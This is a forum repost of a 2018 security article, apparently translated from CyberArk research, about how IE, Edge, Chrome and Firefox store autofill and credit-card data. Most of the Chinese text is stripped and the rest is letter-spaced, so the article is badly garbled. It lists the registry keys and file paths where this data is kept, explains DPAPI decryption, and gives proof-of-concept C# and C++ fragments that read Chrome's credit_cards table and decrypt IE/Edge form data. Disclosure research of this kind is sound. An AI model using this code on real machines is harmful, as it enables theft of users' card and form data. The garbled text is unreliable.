[12595] 2018-04-16_浏览器的自动填充功能真的安全吗?我看未必!

文档创建者:s7ckTeam
浏览次数:4
最后更新:2025-01-18
2018-04-16_浏览器的自动填充功能真的安全吗?我看未必! A l p h a _ h 4 c k   F r e e B u f   2 0 1 8 - 0 4 - 1 6 R o o t k i t / 访 I n t e r n e t   E x p l o r e r   ( I E ) M i c r o s o f t   E d g e G o o g l e C h r o m e M o z i l l a   F i r e f o x 使 便 H T M L 使 线 I E E d g e C h r o m e F i r e f o x
I E E d g e C h r o m e S Q L i t e F i r e f o x S Q L i t e I E E d g e C h r o m e F i r e f o x W i n d o w s   D P A P I 使 D P A P I D P A P I 仿 D P A P I D P A P I 使 F i r e f o x I E E d g e C h r o m e F i r e f o x 西 1 .   S Q L i t e 2 .   使 D P A P I H K E Y _ C U R R E N T _ U S E R S o f t w a r e M i c r o s o f t I n t e r n e t E x p l o r e r I n t e l l i F o r m s F o r m D a t a H K E Y _ C U R R E N T _ U S E R S o f t w a r e C l a s s e s L o c a l S e t t i n g s S o f t w a r e M i c r o s o f t W i n d o w s C u r r e n t V e r s i o n A p p C o n t a i n e r S t o r a g e m i c r o s o f t . m i c r o s o f t e d g e _ 8 w e k y b 3 d 8 b b w e M i c r o s o f t E d g e I n t e l l i F o r m s F o r m D a t a H K E Y _ C U R R E N T _ U S E R S o f t w a r e M i c r o s o f t I n t e r n e t E x p l o r e r I n t e l l i F o r m s S t o r a g e 1 H K E Y _ C U R R E N T _ U S E R S o f t w a r e M i c r o s o f t I n t e r n e t E x p l o r e r I n t e l l i F o r m s S t o r a g e 2 % L o c a l A p p D a t a % G o o g l e C h r o m e U s e r D a t a D e f a u l t W e b   D a t a % A p p D a t a % M o z i l l a F i r e f o x P r o f i l e s { u n i q S t r i n g } . d e f a u l t f o r m h i s t o r y . s q l i t e
S Q L i t e / W e b S Q L i t e D P A P I C r y p t U n p r o t e c t D a t a p D a t a I n [ i n ] D A T A _ B L O B p p s z D a t a D e s c r [ o u t ,   o p t i o n a l ] p O p t i o n a l E n t r o p y [ i n ,   o p t i o n a l ] D A T A _ B L O B p P r o m p t S t r u c t [ i n ,   o p t i o n a l ] C R Y P T P R O T E C T _ P R O M P T S T R U C T N U L L . p D a t a O u t [ o u t ] D A T A _ B L O B - C h r o m e C h r o m e   S Q L i t e C h r o m e W e b   D a t a   S Q L i t e D B   B r o w s e r   f o r   S Q L i t e C h r o m e c r e d i t _ c a r d s
c a r d _ n u m b e r B l o d D a t a C h r o m e D P A P I C h r o m e 使 访 c h r o m e : / / s e t t i n g s / A u t o F i l l 4 9 1 6   4 1 8 2   7 1 8 7   7 5 4 9 使 D P A P I C h r o m e   A P I D P A P I -   C r y p t U n P r o t e c t D a t a ( ) p D a t a O u t - > p b d a t a - 4 9 1 6   4 1 8 2   7 1 8 7   7 5 4 9
C h r o m e I E E d g e 使 I E E d g e B l o b D a t a F i r e f o x 使 D B   B r o w s e r   f o r   S Q L i t e P o C C h r o m e ( C # ) - I E &   E d g e ( C + + ) - s t r i n g   S Q L i t e F i l e P a t h   = E n v i r o n m e n t . G e t F o l d e r P a t h ( E n v i r o n m e n t . S p e c i a l F o l d e r . L o c a l A p p l i c a t i o n D a t a ) + " G o o g l e C h r o m e U s e r   D a t a D e f a u l t W e b   D a t a " ; s t r i n g   t a b l e N a m e   =   " c r e d i t _ c a r d s " ; s t r i n g   C o n n e c t i o n S t r i n g   =   " d a t a   s o u r c e = "   +   S Q L i t e F i l e P a t h   + " ; N e w = T r u e ; U s e U T F 1 6 E n c o d i n g = T r u e " ; s t r i n g   s q l   =   s t r i n g . F o r m a t ( " S E L E C T   *   F R O M   { 0 }   " ,   t a b l e N a m e ) ; S Q L i t e C o n n e c t i o n   c o n n e c t   =   n e w   S Q L i t e C o n n e c t i o n ( C o n n e c t i o n S t r i n g ) S Q L i t e C o m m a n d   c o m m a n d   =   n e w   S Q L i t e C o m m a n d ( s q l ,   c o n n e c t ) ; S Q L i t e D a t a A d a p t e r   a d a p t e r   =   n e w   S Q L i t e D a t a A d a p t e r ( c o m m a n d ) ; D a t a T a b l e   D B   =   n e w   D a t a T a b l e ( ) ; a d a p t e r . F i l l ( D B ) ; D A T A _ B L O B D a t a I n ; D A T A _ B L O B D a t a V e r i f y ; s t d : : v e c t o r < L P C W S T R > R e g K e y s ; R e g K e y s . p u s h _ b a c k ( L " S o f t w a r e M i c r o s o f t I n t e r n e t E x p l o r e r I n t e l l i F o r m s F o r m D a t a " ) ; R e g K e y s . p u s h _ b a c k ( L " S o f t w a r e C l a s s e s L o c a l S e t t i n g s S o f t w a r e M i c r o s o f t W i n d o w s C u r r e n t V e r s i o n A p p C o n t a i n e r S t o r a g e m i c r o s o f t . m i c r o s o f t e d g e _ 8 w e k y b 3 d 8 b b w e M i c r o s o f t E d g e I n t e l l i F o r m s F o r m D a t a " ) ; R e g K e y s . p u s h _ b a c k ( L " S o f t w a r e M i c r o s o f t I n t e r n e t E x p l o r e r I n t e l l i F o r m s S t o r a g e 1 " ) ; R e g K e y s . p u s h _ b a c k ( L " S o f t w a r e M i c r o s o f t I n t e r n e t E x p l o r e r I n t e l l i F o r m s S t o r a g e 2 " ) ; f o r ( i n t   i   =   0 ;   i   <   4 ;   i + + )   / /   r u n   a s   n u m b e r   o f   k e y s { / / r u n o v e r   t h e   R e g K e y s   k e y s R e g O p e n K e y E x ( H K E Y _ C U R R E N T _ U S E R , R e g K e y s [ i ] ,   0 ,   K E Y _ Q U E R Y _ V A L U E ,   & h K e y ) / / r u n o v e r   e a c h   k e y s   v a l u e s   a n d   e x t r a c t i n g   t h e   r e g   v a l u e   ( B l o b D a t a ) f o r ( i n t   j   =   0 ;   j   <   k e y V a l u e s . s i z e ( ) ;   j + + ) { R e g Q u e r y V a l u e E x ( h K e y , k e y V a l u e s [ j ] . c _ s t r ( ) ,   0 ,   0 ,   ( L P B Y T E ) d w R e t u r n ,   & d w B u f S i z e ) ; D a t a I n . c b D a t a =   d w B u f S i z e ; D a t a I n . p b D a t a =   d w R e t u r n ; d e c r y p t C o n t e n t D P A P I ( & D a t a I n , & D a t a V e r i f y ) ;
1 .   h t t p s : / / m s d n . m i c r o s o f t . c o m / e n - u s / l i b r a r y / m s 9 9 5 3 5 5 . a s p x 2 .   h t t p s : / / w w w . s q l i t e . o r g / 3 .   h t t p s : / / w w w . k r a f t k e n n e d y . c o m / r o a m i n g - i n t e r n e t - e x p l o r e r - c h r o m e - u s e r - s a v e d - p a s s w o r d s - u e - v / 4 .   h t t p s : / / m s d n . m i c r o s o f t . c o m / e n - u s / l i b r a r y / w i n d o w s / d e s k t o p / a a 3 8 0 8 8 2 ( v = v s . 8 5 ) . a s p x . a s p x ) 5 .   h t t p s : / / m s d n . m i c r o s o f t . c o m / e n - u s / l i b r a r y / w i n d o w s / d e s k t o p / a a 3 8 0 2 6 1 ( v = v s . 8 5 ) . a s p x . a s p x ) *   c y b e r a r k F B A l p h a _ h 4 c k F r e e B u f . C O M
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则